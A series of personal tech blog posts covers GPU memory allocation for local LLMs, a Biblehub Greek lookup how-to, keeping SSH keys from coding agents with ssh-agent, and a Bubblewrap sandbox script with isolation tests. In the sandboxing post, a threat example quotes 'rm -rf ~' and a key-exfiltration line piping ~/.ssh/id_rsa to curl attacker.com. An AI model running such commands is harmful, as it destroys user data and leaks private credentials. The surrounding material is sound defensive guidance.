Allocating RAM for GPU performance on self hosted LLM systems with integrated System & GPU RAM

Are you sure that the system you’re running self-hosted LLMs on has properly allocated its GPU memory?

I was doing some work on my 128gb Ryzen AMD mini PC. I operate this machine as a linux server dedicated to self-hosted AI infrastructure. I had run into a performance problem on the system where I had saturated all resources and experienced a hard lock. After rebooting to do some troubleshooting, I discovered it didn’t look like my system was operating with 128 gb of RAM.

Diagnosing the problem

This machine’s purpose is hosting local AI inference. The product listing indicated 128 gb of unified memory. Did GMKTeck/Amazon ship me the wrong unit? I tested for system memory:

$ free -h
  Mem: 62Gi

Linux reported sixty-two gigabytes. I tested for the GPU’s VRAM total from the kernel:

$ cat /sys/class/drm/card*/device/mem_info_vram_total
  68719476736

Sixty-four gigabytes on the graphics side. Sixty-two visible to the operating system. That accounts for roughly 126 gigabytes if you add them together, but the system showed only half of the memory I thought I paid for.

Memory in integrated GPU/CPU systems

The processor on this system carries an integrated GPU. Unlike desktop workstations, there is no discrete graphics card on a separate board with dedicated memory. Every byte of physical RAM occupies one unified pool of LPDDR5X shared between CPU and GPU. I should have known this, but I didn’t. I haven’t built a gaming PC in over 20 years. On this hardware, the distinction between “system memory” and “graphics memory” exists only in firmware. On this machine, the BIOS has configurations for assigning memory to the CPU and GPUs.

Integrated graphics have been operating this way for a while. Intel’s onboard GPUs quietly borrow from 128 megabytes up to a gigabyte or two from system RAM.

The Intel 810 chipset (1999) was Intel’s first integrated graphics chipset and used what Intel called “Unified Memory Architecture” (UMA). It borrowed 7-11 MB of system RAM for the GPU’s frame buffer, textures, and Z-buffer. This document describes the Graphics and Memory Controller Hub directly.

Intel later formalized this as DVMT (Dynamic Video Memory Technology), which let the graphics driver and OS dynamically allocate system RAM to the iGPU based on real-time demand. The BIOS setting “DVMT Pre-Allocated” (letting you choose 32 MB, 64 MB, 128 MB, etc.) became a standard fixture on Intel-based motherboards for the next two decades. https://www.techarp.com/bios-guide/dvmt-mode/ documents the DVMT modes in detail.

Intel’s own support documentation still explains this architecture for current hardware: https://www.intel.com/content/www/us/en/support/articles/000020962/graphics.html confirms that integrated Intel GPUs use system memory rather than a separate memory bank.

The kernel-level term is “stolen memory” (or Graphics Stolen Memory / GSM). https://igor-blue.github.io/2021/02/10/graphics-part1.html documents how the UEFI firmware reserves a region of physical RAM for the GPU through the Global GTT, managed by hardware and invisible to the OS’s general memory pool.

This design lineage runs from the Intel 810 in 1999 through every Intel iGPU since, with the same fundamental mechanism: firmware carves system RAM away from the OS and hands it to the GPU. The Strix Halo platform applies the same idea at 1000x the scale.

I’ve never noticed because I’ve been operating with MacOS for the last 15 years.

The M-series chips (M1 through M4) share the same fundamental architecture: CPU, GPU, and Neural Engine all access one physical pool of memory. But Apple and AMD made different choices about how to manage that pool.

On Apple Silicon, macOS sees all the memory and allocates it dynamically. If you buy a MacBook with 64 GB of unified memory, top and Activity Monitor report 64 GB. The GPU draws from that pool on demand. The CPU draws from it on demand. No firmware partition divides them. When the GPU needs 20 GB for a rendering task, it gets 20 GB. When it finishes, that memory returns to the general pool. The OS arbitrates in real time.

But on this purpose-specific machine- the default resource allocations produce performance degradation. It looks like GMKTec is assuming windows and gaming are going to be the main application of this hardware. If your objective is running LLMs locally, the default config is going to need adjustments.

I reached out to GMKTec to clarify if there was a hardware problem. They indicated that the default config assigns 64 gigabytes to graphics and 64 gigabytes to the system. To fix this inefficient configuration, I needed to get into the BIOS and adjust the split.

Adjusting memory allocated to GPUs

That raised a practical question: how much memory should I allocate to the Host OS versus the GPU?

My system has Docker containers handling most of the system workload: a search engine, a workflow automation platform, a CMS, a kanban board, a chat interface for local models and the databases backing all of them. My Gnome/COSMIC desktop session was also running, plus a couple of terminal processes consuming their share of memory. Total system memory use hovered around 12 gigabytes. Fifty gigabytes of allocated system RAM sat idle.

The GPU told the same story from a different angle. Of its 64-gigabyte allocation, 330 megabytes held active data. The local inference server sat installed and waiting. Models rested on disk, ready to load, but nothing filled the VRAM. The GPU’s enormous partition accomplished almost nothing.

$ cat /sys/class/drm/card*/device/mem_info_vram_used
348594176

That returned 348,594,176 bytes, which is roughly 330 MB. The companion command for the total allocation was:

$ cat /sys/class/drm/card*/device/mem_info_vram_total
68719476736

That returned 68,719,476,736 bytes, which is 64 GB.

Both values come from the amdgpu kernel driver, which exposes them as sysfs files under /sys/class/drm/card*/device/. The mem_info_vram_used file reports how much of the GPU’s allocated partition is actively holding data at that moment. The mem_info_vram_total file reports the size of the partition itself.

This machine was built to run large language models. I wasn’t getting the utilization I expected. A 70-billion parameter model quantized to Q8 needs roughly 70 gigabytes of VRAM. With this system’s default, larger models don’t fit. I rebooted into the BIOS and bumped the GPU allocation to 96 gigabytes. The system side drops to 32 gigabytes, which still exceeds my current workloads by a wide margin. Twelve gigabytes of active use against 32 gigabytes of capacity leaves generous headroom for growth.

Post fix memory layout

Aside on model quantization

When you run something like ollama pull deepseek-coder-v2:16b, the quantization level is baked into that specific model file. If you look at the Ollama model library, you’ll typically see tags like:

  • model:7b-q4_0
  • model:7b-q5_K_M
  • model:7b-q8_0
  • model:7b-fp16

The Q4, Q5, Q8, fp16 suffixes indicate the quantization level. Lower numbers mean more compression (smaller file, less VRAM, lower quality). Higher numbers and fp16 mean less compression (larger file, more VRAM, better quality). Quantization reduces the numerical precision of a model’s weights. A weight stored at fp16 uses 16 bits. Q8 uses 8 bits. Q4 uses 4 bits. Fewer bits mean the weight carries a rounded approximation of its original value instead of the precise one the model learned during training.

Where you notice performance that is “higher quality”:

  • Complex reasoning chains. A Q4 model is more likely to lose the thread on multi-step logic, math problems, or long code generation. The accumulated rounding errors across billions of weights degrade the model’s ability to hold coherent structure over long outputs.
  • Nuance in language. Word choice becomes slightly flatter. A fp16 model might select a precise, unexpected word. The Q4 version gravitates toward more generic alternatives. The difference is hard to spot in a single response but becomes noticeable over a session.
  • Instruction following. Heavily quantized models drift from instructions more often. They might ignore a formatting constraint, repeat themselves, or partially answer a question. The precision loss makes the model slightly less responsive to the signal embedded in your prompt.
  • Factual reliability. Q4 models hallucinate marginally more. The degraded weights weaken the model’s ability to distinguish between what it “knows” confidently and what it is guessing at.

Where you probably won’t notice “lower quality” quantization levels:

  • Simple question and answer.
  • Casual conversation.
  • Summarization of short texts.

Ollama does not re-quantize a model at load time. You pick your quantization when you pull the model. With this change, I now have the ability to pull larger models with higher precision for experimentation & training. This produces increases in inference quality and a far better experience with models.

Hope this helps- To summarize:

There are a few systems that have come out in recent months that are good candidates for running local LLMs. If you get a mini-pc with AMD hardware, you’re likely going to need to adjust the split of ram for your inference goals. I covered how I encountered a problem that led me to discover problems with my config- and I summarized how to reason about changing the config for better performance.

Want help building self-hosted LLMs? Let’s connect!

Post Script:
If you’re exploring buying hardware for self hosting and considering an AMD GPU- you should absolutely take some time to read https://strixhalo.wiki/Guides/Buyer’s_Guide

The Strixhalo wiki has a ton of valuable & relevant resources.

Some Bible Translatin’

Biblehub is a nice website with a finicky UI.  Here are some instructions on how to use Biblehub’s “Strong Concordance” to perform two  actions:

  • Researching the Greek language version of terms in the New Testament
  • Finding other passages in the bible that use the relevant term 

First- go to Biblehub and search a phrase- e.g. “Joyful Always” from 1 Thessalonians 5:16.​

Note that when biblehub finds a hit for this phrase, there will be a drop down item you can select for it.  YOU MUST CLICK ON THE DROP DOWN ITEM.  Hitting “enter” will take you to a search of the database and just give you a list of instances.  Clicking on the item takes you to the identified passage where the term is found.  ​If there is no drop down that shows up- it may be that you have a typo- or the page is loading very slow.

This will take you to the verse. You can select a bible translation to compare the passage’s language in different translations.  Note the listings of all bible versions:​

Screenshot of different bible translations of the specified verse.

You now can compare different translations for their version of the statement. 

To research the Greek term for “rejoice always”, click on “Strong’s” from this page. ​

This will take you to a page that provides the original greek for the translated section:

Greek translations of “Always Rejoice” from 1 Thessalonians 5:16

To find a cross-reference list of all other passages in the bible that use that term, click on the Greek word (in this case, Chairete). This enables you to see other passages that relate to the term.

Bible Passages that use the Greek word “Chairete”

You now are a scholar who can find the original Greek for your bible passages- and find other bible passages that reference the same term! Woo!

Giving coding agents ssh access without disclosing secrets

LLM agents with read access to private ssh keys is the hottest new security mistake since the hardcoded password.

You’ve set up Claude Code (or Cursor, or Copilot) and your coding needs to connect to a remote system.

The prompt asks you: how should the agent authenticate?

What’s going on here?

ssh-keyscan is a tool that gathers the public SSH host keys found on the local system. It reduces some friction in ssh if the user has failed to put a key in an ssh connection request. If you have the public key in your $HOME directory, ssh-keyscan will try to find it.

Claude’s hoping I left a key around for the remote host. It will try to add it to the known_hosts file, which will enable it to make a direct connection to the other system if I have password auth disabled.

For extra safety- it won’t accept any scenario where the remote host’s ssh key has changed. This is “Safe” because the events where a system offers a new key should be very limited- regularly being prompted to accept a new key for a host is an indicator that someone has brought a malicious server online with the same hostname. These solutions are incomplete. In this instance, the agent’s trying to connect to a host even though it doesn’t have the key.

It’s making a valiant effort- but it will fail. I ssh-copy’d a key to this system, but I’m running sandboxed Claude and protecting the agent from access to the ssh key.

Some folks might entertain a dangerous solution: paste in your SSH key, set an environment variable, or hand over your Git credentials. It works… why worry?

You should be wondering:

Where will that secret actually go? Is it logged somewhere? Is the LLM provider training against my private key? Can the agent exfiltrate it? What happens if the agent’s process gets compromised?

The moment you hand a credential to an AI agent, you’ve lost control of it. You can’t audit where it went, you can’t revoke access without rotating secrets, and you’ve given an LLM a secret that can never leak. Chat histories get filled with desirable secrets. This should be concerning.

There is a better way to give your agents access to other systems than giving them a private key. It’s been around for decades. Networking and operations engineers use it all the time- but it seems to be less well known among devs. By the end of this post, you’ll know how to give a coding agent full SSH authentication capability while ensuring agent never knows your private key. You’ll feel greater confidence when access is revocable with a single command. Even a fully compromised agent can’t steal your private keys.

What is SSH-agent?

ssh-agent is a background process that holds your decrypted private keys in memory so you don’t have to re-enter your passphrase every time you use them.

How ssh-agent works:

  1. Your private key (e.g. ~/.ssh/id_ed25519) is stored encrypted on disk, protected by your passphrase
  2. You run ssh-add to decrypt the key and hand it to the agent
  3. The agent holds the decrypted key in memory
  4. When you ssh somewhere, the SSH client asks the agent to perform the cryptographic signing — the private key never leaves the agent process

Why ssh-agent exists:

  • Convenience — type your passphrase once per session instead of every connection
  • Security — the decrypted key lives only in memory, never written to disk unencrypted. Programs that need to authenticate
    ask the agent rather than accessing the key file directly
  • Forwarding — with ssh -A, the agent can be forwarded to remote hosts so you can hop between machines without copying your private key around. It’s essentially a secure key wallet that runs in the background for the duration of your login session.

How ssh-agent keeps ssh keys private from AI

ssh-agent implements a delegation without disclosure pattern:


  ┌─────────────┐        ┌───────────┐        ┌──────────────┐
  │  ssh-agent  │◄──────-│  Coding   │───────►│  Remote Host │
  │ (your keys) │ signs  │  Agent    │  SSH   │  (GitHub,    │
  │             │ data   │  process  │  conn  │   server)    │
  └─────────────┘        └───────────┘        └──────────────┘
  1. You start ssh-agent and unlock your key with ssh-add
  2. The coding agent inherits the $SSH_AUTH_SOCK environment variable — a Unix socket path to where the ssh-agent process is listening.
  3. When the agent needs to authenticate, SSH asks the agent process to sign a challenge
  4. The agent process asks ssh-agent (via the socket) to do the signing
  5. ssh-agent signs the challenge and returns the signature
  6. The private key never crosses the socket. Only signatures go back.

When you start ssh-agent, it creates a socket file (e.g., /tmp/ssh-XXXXX/agent.12345). It then exports the $SSH_AUTH_SOCK environment variable- which points to that socket. Any process that inherits this variable can communicate with the agent. SSH clients use this socket to ask ssh-agent to sign authentication challenges. The socket is a communication channel- it is not a credential. Reading the variable only gives you a path — without the ssh-agent process behind it, the socket is useless. This gives your agent the ability to ask for the SSH-AGENT to sign it’s requests without ever having access to the account key.

You may ask: how do I keep rogue processes from requesting signatures from the SSH-AGENT? Unfortunately- If they’re running under your user account, you’re going to have challenges. Everything that runs as you has the same access rights as you. You’ll want to move those potentially rogue processes to another user account and apply some ACLs. The nice thing about ssh-agent is you can just kill it when you’re done delegating SSH authentication to agentic processes. But if you need to be cautious:

  • Run the agent in a sandboxed environment (container, VM) with its own ssh-agent holding limited-scope keys
  • Use deploy keys with read-only access instead of your personal key
  • Use short-lived certificates (e.g., via Vault or Teleport) instead of long-lived keys

Why This Matters for AI Agents Specifically

Least privilege by design The agent can authenticate but cannot exfiltrate the secret. Even if the agent’s process is compromised, the attacker gets a socket that only works while your agent session is alive — not a portable credential.

Auditability The agent can’t copy the key and use it later or from another machine. Access is bound to the lifetime of the socket.

Revocability Kill the ssh-agent process or remove the key with ssh-remove, and the agent instantly loses access. No secret rotation needed.

No secret in the environment Compare this to the common pattern of stuffing API_KEY=sk-… into environment variables.
Those can be read by any process, printed with env, leaked in logs. The SSH_AUTH_SOCK only points to a socket. Reading the path to a socket is generally not a security sensitive action.

The Capabilty-based security model

This is an instance of a capability-based security model. Instead of sharing a secret (something you know), you share a capability (something you can do through a controlled channel). The coding agent gets the capability to authenticate as you, scoped to:

  • Time — only while the agent process runs
  • Mechanism — only through the SSH protocol
  • Operation — only signing challenges, not extracting keys

This is the same idea behind hardware security modules (HSMs), smart cards, and FIDO keys — the secret never leaves a trusted boundary, and all consumers interact through a signing oracle.

Practical Example

Start the session

eval "$(ssh-agent -s)"
Add a public key that can be exposed to the agent
ssh-add ~/.ssh/id_ed25519 
You'll be prompted to enter your passphrase for the key- and now the ssh-agent will have the ability to sign requests without exposing the private key. 

You can now launch your coding agent — it inherits SSH_AUTH_SOCK.  Your coding agent can now git pull, ssh deploy, etc. When you're done, kill the agent: 

ssh-agent -k # all delegated access revoked instantly 

You can see that killing the agent kills the socket. A coding agent can be invoked and have full SSH access without reading a secret.

Agent frameworks should be built using capability delegation. Don’t give ai agents read access to credentials. ssh-agent is a tool you can use to provision access privileges without disclosing secrets. It’s a key tool for granting AI systems access to infrastructure.

Do you need help building secure agentic products and workflows?

Let’s connect!

Post script:

After a posting on LinkedIn, Luke Hinds observed similar ideas behind a recent pull request by Francois Proulux which added UNIX Domain sockets that supports using Secure Enclave backed ssh-agents in Nono.sh. Worth a look!

A detailed writeup of Claude Code constrained by Bubblewrap.

An AI agent that can edit files can also delete them. Here’s a detailed explanation of how I set boundaries while still keeping Claude powerful.

When you let an AI assistant run commands on your computer, you face a problem: the assistant needs enough access to help you, but you don’t want it wandering through your entire system, reading your .env files, scanning your photos. Last week I wrote about how you can use Bubblewrap to prevent agents from accessing your files. There were some interesting comments on HackerNews that inspired me to do some further experimentation and explanation of my config.

I wanted to write a more detailed summary about this config for anyone who is going to try and incorporate bubblewrap into your workflow. I also want to make it insanely easy for you to get started with your bubble wrapping. To that end, I have a couple of Git Repositories you can clone to get started.

If you want to get started with bubblewrap+claude, you can use one of my sample scripts. Btw- I also created versions for fire jail & Apple’s “Containers”

https://github.com/CaptainMcCrank/SandboxedClaudeCode

The bubblewrap script passes all arguments through to Claude via “$@”. Just append your arguments after the script:

./bubblewrap_claude.sh --dangerously-skip-permissions "ruminate on the nature of life"

Don’t trust strangers on the Internet. Here is a git repository of tests you can use to prove if the containers work. read them and understand them. I have exposition below that explains each test in detail. They will help you understand how to execute the tests and validate if the controls work.

https://github.com/CaptainMcCrank/BlogCode/tree/main/BubblewrapTests

The approach above will give your bubblewrap container access to a file system structure like the following:

I welcome collaboration! Please file git issues against my code if you think you have a better approach!


The Complete Command

Here’s the full Bubblewrap command. Save this as a script (e.g., sandboxed-claude.sh), make it executable with chmod +x sandboxed-claude.sh, then run it from any project directory.

#!/usr/bin/env bash

# Optional paths - only bind if they exist
OPTIONAL_BINDS=""
[ -d "$HOME/.nvm" ] && OPTIONAL_BINDS="$OPTIONAL_BINDS --ro-bind $HOME/.nvm $HOME/.nvm"
[ -d "$HOME/.config/git" ] && OPTIONAL_BINDS="$OPTIONAL_BINDS --ro-bind $HOME/.config/git $HOME/.config/git"

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --ro-bind /etc/resolv.conf /etc/resolv.conf \
  --ro-bind /etc/hosts /etc/hosts \
  --ro-bind /etc/ssl /etc/ssl \
  --ro-bind /etc/passwd /etc/passwd \
  --ro-bind /etc/group /etc/group \
  --ro-bind "$HOME/.ssh/known_hosts" "$HOME/.ssh/known_hosts" \
  --bind "$(dirname $SSH_AUTH_SOCK)" "$(dirname $SSH_AUTH_SOCK)" \
  --ro-bind "$HOME/.gitconfig" "$HOME/.gitconfig" \
  $OPTIONAL_BINDS \
  --ro-bind "$HOME/.local" "$HOME/.local" \
  --bind "$HOME/.npm" "$HOME/.npm" \
  --bind "$HOME/.claude" "$HOME/.claude" \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --setenv HOME "$HOME" \
  --setenv USER "$USER" \
  --setenv SSH_AUTH_SOCK "$SSH_AUTH_SOCK" \
  --share-net \
  --unshare-pid \
  --die-with-parent \
  --chdir "$PWD" \
  "$(which claude)" "$@"

This looks complex. I promise it’s not. The only weirdness is at the beginning, where the script checks for optional paths like .nvm and .config/git before binding them. Not everyone uses nvm for Node.js management, and git’s config directory location varies. If you use other version managers (like fnmasdf, or volta), add similar conditional binds for their directories.

The rest of this post explains what each piece does and why I included it.


The System Tools

Your computer stores its programs in folders like /usr/lib, and /bin. These folders contain thousands of tools: file editors, network utilities, programming languages, and more.

I give the AI read-only access to these folders. “Read-only” means the AI can use these tools but cannot change them. The AI can run git to manage code. The AI can run node to execute JavaScript. But the AI cannot replace these programs with different versions or delete them.

Without these folders, every command fails with “command not found.” The sandbox contains no programs to run.

I also share a few files from /etc, your computer’s configuration folder:

  • /etc/resolv.conf: Without this, DNS lookups fail. The AI cannot translate “github.com” into an IP address, so git clone and npm install break.
  • /etc/ssl: Without this, HTTPS connections fail. The AI cannot verify that a server is who it claims to be.
  • /etc/passwd and /etc/group: Without these, programs display raw numeric IDs instead of usernames. Git commits show “1000” instead of “patrick.”

Your Personal Files

You keep important files in your home folder. Git needs your .gitconfig file to know your name and email. Node.js lives in your .nvm folder.

I share these files as read-only. The AI can use your git identity to make commits. But the AI cannot change your git settings or modify your configuration files.

SSH Access Without Exposing Your Keys

SSH keys prove your identity to remote servers. Exposing them directly to the sandbox creates risk—the AI could read your private key files. I use a safer approach: SSH agent forwarding.

The SSH agent runs outside the sandbox on your host machine. It holds your decrypted keys in memory. Programs inside the sandbox can ask the agent to sign requests, but they never see the actual key material.

Here’s how to set it up:

Step 1: Start the SSH agent (if not already running)

Most Linux desktop environments start the agent automatically. Check if yours is running:

echo $SSH_AUTH_SOCK

If this prints a path like /run/user/1000/keyring/ssh, your agent is running and you’re set.

Important: If SSH_AUTH_SOCK is empty, you can start an agent manually with eval "$(ssh-agent -s)". However, manually started agents create sockets under /tmp (e.g., /tmp/ssh-XXXXX/agent.1234). This conflicts with our sandbox’s --tmpfs /tmp mount, which creates an isolated /tmp that hides the host’s socket.

If you must use a manually started agent, either:

  1. Start the agent with a custom socket location: ssh-agent -a /run/user/$(id -u)/ssh-agent.sock and export SSH_AUTH_SOCK accordingly
  2. Or move the --tmpfs /tmp line in the script to appear before the --bind "$(dirname $SSH_AUTH_SOCK)" line (bind mounts take precedence over earlier tmpfs mounts for their specific paths)

For simplicity, I’d recommend using your desktop environment’s built-in agent when possible.

Step 2: Add your key to the agent

ssh-add ~/.ssh/id_ed25519

Replace id_ed25519 with your key’s filename. The agent prompts for your passphrase once, then holds the decrypted key in memory.

Step 3 (Optional but recommended): Require confirmation for each use

ssh-add -c ~/.ssh/id_ed25519

The -c flag tells the agent to ask for confirmation every time something tries to use the key. A dialog box appears on your screen: “Allow use of key?” You must click confirm. The AI cannot bypass this—the prompt happens outside the sandbox.

What this buys you:

ApproachAI can read private key?AI can use key silently?
Direct ~/.ssh bindingYesYes
SSH agentNoYes
SSH agent with -c flagNoNo

The sandbox script binds only ~/.ssh/known_hosts (so SSH can verify server identities) and the agent socket (so SSH can request signatures). Your private key files stay outside the sandbox entirely.


The Working Directory

Your goal is to develop software within a specific project folder. The AI needs write access to that folder to create files, modify code, and delete outdated artifacts.

I bind the current working directory ($PWD) with read-write access. When you run the sandbox script from /home/youruser/projects/my-app, the AI can modify anything inside my-app. When you run it from a different folder, the AI works there instead. The sandbox adapts to wherever you invoke it.

This scoping provides two benefits. First, the AI can do useful work—writing code, running builds, managing files. Second, the AI cannot touch anything outside that folder. Your other projects, your documents, your system files all remain invisible and unreachable.

I also give write access to two other locations outside your project folder.

The .npm folder stores downloaded packages. When the AI runs npm install, npm caches packages here so future installs run faster. Without write access, the AI could still install packages into your project’s node_modules, but every install would re-download everything from scratch. With write access to .npm, the AI can install dependencies at normal speed and benefit from cached packages across all your projects.

The .claude folder stores authentication credentials. This binding deserves special attention. When you first run Claude, you authenticate through your browser. Claude stores a session token in ~/.claude so you don’t repeat this process every time. Without write access to this folder, the sandbox cannot persist your login. You would need to re-authenticate every time you start the sandboxed Claude—a significant usability problem. With write access, you log in once and the session persists across sandbox invocations.


The Fake Temporary Folder

Every program needs a place to store temporary files. Normally, programs use /tmp, a shared folder visible to everything on your computer.

I create a fake /tmp that only the AI can see. When the AI writes temporary files, those files exist only inside the sandbox. When the sandbox closes, those files vanish.

This prevents the AI from leaving debris scattered across your system. It also prevents the AI from reading temporary files that other programs created.


Process Isolation

Your computer runs hundreds of processes at once: your web browser, your music player, system services, and more. Normally, any program can see the full list.

The --unshare-pid flag creates a separate process namespace for the sandbox. When the AI looks at running processes, it sees only itself and the programs it started. Your browser, your email client, your other terminals—all invisible. This prevents the AI from sending signals to other programs or inspecting what they do.

The --die-with-parent flag sets a kill switch: if the parent process dies, the sandbox dies with it. No orphaned AI processes linger after you close your terminal.


The Network Question

Networks present the hardest choice.

An AI with network access can clone repositories, install packages, and fetch documentation. An AI without network access cannot do any of those things.

An AI with network access can also send files or other information to external servers. This represents a real risk when working with private codebases.

I chose to allow network access. Most programming tasks require it. But you should understand: anything the AI can read, the AI can theoretically transmit elsewhere.

A paranoid setup would disable networking entirely. You would pre-download all dependencies, clone all repositories ahead of time, and work offline. This approach works for high-security situations but breaks the normal development workflow.


What This Buys You

The sandbox prevents accidents and limits damage.

The AI cannot read your documents, photos, or browser history—I never shared those folders. The AI cannot install system-wide packages or modify your shell configuration. The AI cannot see your password manager or read your email.

The AI operates in a controlled space: your project folder, plus the tools needed to work on it.


What This Does Not Buy You

The sandbox does not prevent a determined attack through the network. If the AI decided to exfiltrate your code, network access makes that possible.

The sandbox does not prevent damage to your project folder. The AI has full write access there—it can delete everything.

Security involves tradeoffs. I have tried to balance usability and protection. A tighter sandbox would be safer but less easy to use during experimentation & rapid development.

This configuration is useful for everyday development work, protected against casual mistakes but could be vulnerable to sophisticated attacks. For most scrappy programming tasks, this balance should be sufficient.


Testing Your Sandbox

Before trusting your sandbox, verify it works. These commands let you poke at the walls and confirm they hold.

Test 1: Confirm your home directory contents are hidden

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --chdir "$PWD" \
  /bin/sh -c "ls $HOME/.bashrc 2>&1; ls $HOME/Documents 2>&1"

Both commands should fail with “No such file or directory”. Note that ls $HOME itself may show a partial directory structure (like Development) because Bubblewrap creates the path hierarchy needed to reach your bound $PWD. But the actual contents of your home folder—config files, documents, other projects—remain invisible.

Test 2: Confirm you cannot write to read-only paths

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --ro-bind "$HOME/.gitconfig" "$HOME/.gitconfig" \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --chdir "$PWD" \
  /bin/sh -c "echo 'test' >> $HOME/.gitconfig"

This should fail with “Read-only file system”. The sandbox prevents writes to paths mounted with --ro-bind.

Test 3: Confirm you CAN write to the working directory

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --chdir "$PWD" \
  /bin/sh -c "touch sandbox-test-file && rm sandbox-test-file && echo 'Write access confirmed'"

This should print “Write access confirmed”. The sandbox allows writes to paths mounted with --bind.

Test 4: Confirm process isolation

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --unshare-pid \
  --chdir "$PWD" \
  /bin/ps aux

This should show only a few processes (ps itself and its parent). Your browser, terminal, and other applications stay hidden.

Test 5: Confirm /tmp isolation

Run this in one terminal:

echo "secret from host" > /tmp/host-secret.txt

Then run this in the sandbox:

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --chdir "$PWD" \
  /bin/cat /tmp/host-secret.txt

This should fail with “No such file or directory”. The sandbox has its own empty /tmp and cannot see files in the host’s /tmp.

Test 6: Confirm SSH agent works but keys are hidden

First, verify you have a key loaded in your agent:

ssh-add -l

This should list your key. Now test that the sandbox can use the agent but cannot read the key file:

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --ro-bind "$HOME/.ssh/known_hosts" "$HOME/.ssh/known_hosts" \
  --bind "$(dirname $SSH_AUTH_SOCK)" "$(dirname $SSH_AUTH_SOCK)" \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --setenv SSH_AUTH_SOCK "$SSH_AUTH_SOCK" \
  --chdir "$PWD" \
  /bin/sh -c "ssh-add -l && cat ~/.ssh/id_ed25519"

The first command (ssh-add -l) should succeed and list your keys. The second command (cat ~/.ssh/id_ed25519) should fail with “No such file or directory”. The sandbox can use your SSH identity through the agent, but cannot read the private key file itself.


If all six tests pass, your sandbox walls are solid. The AI operates in the space you defined—no more, no less. Again- you can just git clone these tests from https://github.com/CaptainMcCrank/BlogCode/tree/main/BubblewrapTests.

Happy hacking!

A better way to limit Claude Code (and other coding agents!) access to Secrets

Last week I wrote a thing about how to run Claude Code when you don’t trust Claude Code. I proposed the creation of a dedicated user account & standard unix access controls. The objective was to stop Claude from dancing through your .env files, eating your secrets. There are some usability problems with that guide- I found a better approach and I wanted to share.

TL;DR: Use Bubblewrap to sandbox Claude Code (and other AI agents) without trusting anyone’s implementation but your own. It’s simpler than Docker and more secure than a dedicated user account. Bubblewrap delivers a sweet spot combination of control AND flexibility that enables experimentation.

What Changed Since My Last Post

Immediately after publishing, I caught the flu. During three painful days in bed, I realized there are other better approaches. Firejail would likely work well- but also there’s another solution called Bubblewrap.

As I dug into Bubblewrap, I realized something else… Anthropic uses Bubblewrap!

But Anthropic embeds bubblewrap in their client. This implementation has a major disadvantage.

Embedding bubblewrap in the client means you have to trust the correctness and security of Anthropic’s implementation. They deserve credit for thinking about security, but this puzzles me. Why not publish guidance so users can secure themselves from Claude Code? Aren’t we going to need this for ALL agents? Isn’t this solution generalizable?

Defense-in-depth means we don’t rely on any single vendor to execute perfectly 100% of the time. Plus, this problem applies to all coding agents, not just Claude Code. I want an approach that doesn’t tie my security to Anthropic’s destiny.

The Security Problem We’re Solving

Before we dive into Bubblewrap, here’s what we’re protecting against:

  • You want to run a binary that will execute under your account’s permissions
  • Your account has access to sensitive files unrelated to the project you’re working on
  • You want your binary to invoke other standard system tools like lsps -aux, or less
  • We want to invoke this binary while easily preventing it from accessing sensitive files unrelated to binary’s activities

What if Claude Code has a bug? What happens if the bug is exploited, and bubblewrap constraints embedded within the client are not activated? Will Claude Code run rm -rf ~ or cat ~/.ssh/id_rsa | curl attacker.com?

Without your own wrapping of the agent, you’re at risk. When you wrap your coding agent calls with Bubblewrap, the agent’s access to dangerous commands is prevented.

What Is Bubblewrap?

Bubblewrap lets you run untrusted or semi-trusted code without risking your host system. We’re not trying to build a reproducible deployment artifact. We’re creating a jail where coding agents can work on your project while being unable to touch  ~/.aws, your browser profiles, your ~/Photos library or anything else sensitive.

Let’s explore Bubblewrap through the command line:

# Install it (Debian/Ubuntu)
sudo apt install bubblewrap

# Simplest possible sandbox - just isolate the filesystem view
bwrap --ro-bind /usr /usr --symlink usr/lib /lib --symlink usr/lib64 /lib64 \
      --symlink usr/bin /bin --proc /proc --dev /dev \
      --unshare-all --die-with-parent \
      /bin/bash

# Inside the sandbox, try:
ls /home          # Empty or nonexistent
ls /etc           # Empty or nonexistent  
whoami            # Shows "nobody" or your mapped user
ping google.com   # Fails - no network

How This Command Works

This command creates a minimal sandboxed environment. Here’s what each part does:

Filesystem access:

  • --ro-bind /usr /usr mounts your system’s /usr directory as read-only inside the sandbox
  • The --symlink commands create shortcuts so programs can find libraries and binaries in expected locations
  • --proc /proc and --dev /dev give minimal access to system processes and devices

Isolation:

  • --unshare-all disconnects the sandbox from all system resources (network, shared memory, mount points, etc.)
  • --die-with-parent kills the sandbox if your main terminal closes

The Result:

Bash runs inside a stripped-down environment. It can execute programs from /usr but can’t see your home directory, config files, or access the network. Programs work, but they’re operating in a ghost town version of your filesystem.

Why Bubblewrap Beats Docker

This beats Docker for quick workflows. Docker requires a running daemon and lots of configuration files. Bubblewrap lets you execute your app directly—no daemon, no stale containers cluttering your system.

If you’re experienced enough to worry about Docker misconfigurations, Bubblewrap gives you more control when you need it. You just run a command. No YAML files or debugging background services.

Quick Start: Running Claude Code with Bubblewrap

